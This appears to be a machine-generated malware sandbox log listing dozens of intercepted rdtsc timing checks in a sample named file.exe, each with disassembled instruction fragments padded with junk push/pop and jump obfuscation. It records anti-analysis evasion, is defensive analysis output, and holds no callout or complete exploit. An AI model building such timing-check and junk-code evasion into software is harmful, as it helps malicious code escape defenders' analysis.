Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C75F second address: C6C765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C765 second address: C6C76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C818C6 second address: C818D9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F345319E6h 0x00000008 jns 00007F0F345319E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86161 second address: C86177 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F34BEC146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F0F34BEC146h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C862C9 second address: C862E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0F345319ECh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C856 second address: C8C85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C947EF second address: C94818 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F345319EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0F345319FDh 0x00000010 jmp 00007F0F345319EDh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C946A3 second address: C946A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9D9FF second address: C9DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DA03 second address: C9DA29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC152h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0F34BEC148h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DD69 second address: C9DD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DD6D second address: C9DD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DD73 second address: C9DDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F345319F6h 0x0000000f jmp 00007F0F345319F5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DDA8 second address: C9DDD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC150h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F0F34BEC14Ch 0x00000011 ja 00007F0F34BEC146h 0x00000017 js 00007F0F34BEC152h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DF04 second address: C9DF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0AC second address: C9E0B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0B1 second address: C9E0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F0F345319E6h 0x00000010 jmp 00007F0F345319EEh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F0F345319FCh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0DB second address: C9E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007F0F34BEC146h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EB45 second address: C9EB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EB62 second address: C9EB6C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA1649 second address: CA1666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA1666 second address: CA166A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA166A second address: CA166E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA166E second address: CA168D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC159h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3E5B second address: CA3E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB1036 second address: CB1046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Ah 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB1046 second address: CB104A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB104A second address: CB106C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0F34BEC173h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F34BEC152h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD96A second address: CBD96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFBDC second address: CBFBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6FC1 second address: BB6FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6FCD second address: BB6FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC3C3A second address: CC3C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC576C second address: CC57CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0F34BEC14Dh 0x00000010 jp 00007F0F34BEC146h 0x00000016 jmp 00007F0F34BEC155h 0x0000001b popad 0x0000001c push ebx 0x0000001d jmp 00007F0F34BEC152h 0x00000022 pop ebx 0x00000023 popad 0x00000024 pushad 0x00000025 jnc 00007F0F34BEC152h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC0F81 second address: BC0F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD5D5 second address: CDD5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD5D9 second address: CDD5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F0F345319E6h 0x0000000f je 00007F0F345319E6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDB6F second address: CDDB77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDB77 second address: CDDB7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDF8D second address: CDDF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDF91 second address: CDDFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0F345319E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d je 00007F0F345319E6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDFA7 second address: CDDFD5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F34BEC14Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jmp 00007F0F34BEC156h 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDFD5 second address: CDDFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE265 second address: CDE270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE3B9 second address: CDE3D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jns 00007F0F345319E6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F0F345319E8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE3D3 second address: CDE3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1024 second address: CE102B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE124D second address: CE1253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1371 second address: CE1375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1375 second address: CE13AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F0F34BEC155h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE13AD second address: CE13B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1628 second address: CE162E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE162E second address: CE1673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007F0F34531A00h 0x0000000d nop 0x0000000e mov dl, 4Ah 0x00000010 push dword ptr [ebp+122D26C2h] 0x00000016 sbb edx, 4D93AAF0h 0x0000001c call 00007F0F345319E9h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1673 second address: CE1679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1679 second address: CE1690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0F345319E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1690 second address: CE16A5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F34BEC148h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE3F7C second address: CE3F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5ED2 second address: CE5ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70D67 second address: 4C70D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70D6B second address: 4C70D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70D71 second address: 4C70DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F345319F2h 0x00000008 pop eax 0x00000009 movsx edx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0F345319EFh 0x00000019 sub esi, 3316762Eh 0x0000001f jmp 00007F0F345319F9h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F0F345319F0h 0x0000002b xor ecx, 7C7773A8h 0x00000031 jmp 00007F0F345319EBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70DE5 second address: 4C70E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov di, 6516h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F0F34BEC155h 0x00000019 and ah, 00000076h 0x0000001c jmp 00007F0F34BEC151h 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E23 second address: 4C70E54 instructions: 0x00000000 rdtsc 0x00000002 mov bl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0F345319F3h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F345319F0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E54 second address: 4C70E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E5A second address: 4C70E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E60 second address: 4C70E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E64 second address: 4C70E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E68 second address: 4C70E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F34BEC14Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E7E second address: 4C70E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E84 second address: 4C70E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CB3 second address: 4C60CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CC3 second address: 4C60CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CC7 second address: 4C60CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319ECh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B76 second address: 4CA0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B7C second address: 4CA0B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B80 second address: 4CA0C0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, 861Bh 0x00000011 mov si, 68F7h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F0F34BEC153h 0x0000001e adc si, BD7Eh 0x00000023 jmp 00007F0F34BEC159h 0x00000028 popfd 0x00000029 mov esi, 4043FBC7h 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F0F34BEC14Ah 0x00000035 mov ebp, esp 0x00000037 jmp 00007F0F34BEC150h 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F0F34BEC157h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0C0E second address: 4CA0C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0C14 second address: 4CA0C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C400E7 second address: 4C40113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esp 0x00000007 jmp 00007F0F345319EAh 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F0F345319F0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40113 second address: 4C40119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40119 second address: 4C4011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4011F second address: 4C40123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40123 second address: 4C40143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movzx esi, dx 0x0000001d mov ch, dh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60A0B second address: 4C60A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60567 second address: 4C6058F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4512E871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F0F345319ECh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F345319EEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6058F second address: 4C60595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60485 second address: 4C6048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6048B second address: 4C6048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6048F second address: 4C60493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60493 second address: 4C604CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F0F34BEC154h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F34BEC157h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604CC second address: 4C60507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60507 second address: 4C6050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6050B second address: 4C60511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
